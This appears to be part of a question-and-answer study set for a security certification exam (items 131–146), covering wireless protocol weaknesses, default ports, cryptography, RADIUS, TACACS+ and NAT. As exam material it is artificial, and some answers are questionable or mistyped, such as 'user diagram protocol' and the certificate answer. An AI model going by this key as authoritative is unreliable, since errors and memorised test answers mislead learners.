Question 131

Which of the following wireless protocols could be vulnerable to a brute force password attack ? Select two

WPA2PSK
WPA EAP TLS
WPA2 CCMP
WPA CCMP
WPA LEAP
WEP

Answer 131

WPA2 PSK

WPA LEAP

Question 132

Which of the following protocols provides fast unreliable file transfer ?

TFTP
SFTP
Telnet
FTPS

Answer 132

TFTP

Question 133

Which of the following are restricted to 64-bit block sizes ?

PGP
DES
AES256
RSA
3DES
AES

Answer 133

DES

3DES

Question 134

Which of the following practices is known to mitigate a known security vulnerability?

Application fuzzing
Patch management
Password cracking
Auditing security logs

Answer 134

Patch management

Question 135

Which of the following is the best way to prevent cross site request forgery (XSRF) attacks ?

Check the referrer field in the HTTP header
Disable flash content
Use only cookies for authentication
Use only HTTPS URLS

Answer 135

Check the referrer field in the HTTP header

Question 136

Which of the following would a security specialist be able to determine upon examination of a servers certificate?

A. Public key
B. Server private key
C. Csr
D oid

Answer 136

D. OID

Question 137

What is an NTP server

Answer 137

The Network Time Protocol (NTP) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks. In operation since before 1985, NTP is one of the oldest Internet protocols in current use. NTP was designed by David L. Mills of the University of Delaware.

Question 138

RADIUS

Answer 138

Remote authenticAtion dial in user service

Centralized authentication for multiple servers
Uses UDP (user diagram protocol) as a delivery mechanism
Provides authentication, authorization, and accounting

Question 139

Port scanner

Answer 139

application designed to probe a server or host for open ports. Such an application may be used by administrators to verify security policies of their networks and by attackers to identify network services running on a host and exploit vulnerabilities.

Question 140

What authentication services should be used on port 389 by default ?

Answer 140

LDAP

Question 141

TACACS+

Answer 141

Terminal access controller access-control system plus

An authentication service that provides central authentication for remote access clients ( can be used as an alternative to RADIUS)

Question 142

NAT

Answer 142

Network address translation

A service that translates public IP addresses to private IP addresses and vice versa

Question 143

Which of the following types of cryptography should be used when minimal overhead is necessary for a mobile device ?

Block cipher
Elliptical curve cryptography
Diffie-Hellman algorithm
Stream cipher

Answer 143

Elliptical curve cryptography

Question 144

Which of the following results in datacenters with failed humidity controls ? Pick two

Excessive EMI
Electrostatic charge 
Improper ventilation 
Condensation 
Irregular temperature

Answer 144

Electrostatic charge

Condensation

Question 145

Which of the following uses port 22 by default

Ssh
Ssl
Tls 
Sftp 
Scp 
Ftps 
Smtp 
Snmp

Answer 145

Ssh
Sftp
Scp

Question 146

Which of the following ports should be opened on a firewall to allow for NETBIOS communication?

110
137
139
143
161
443

Answer 146

137

139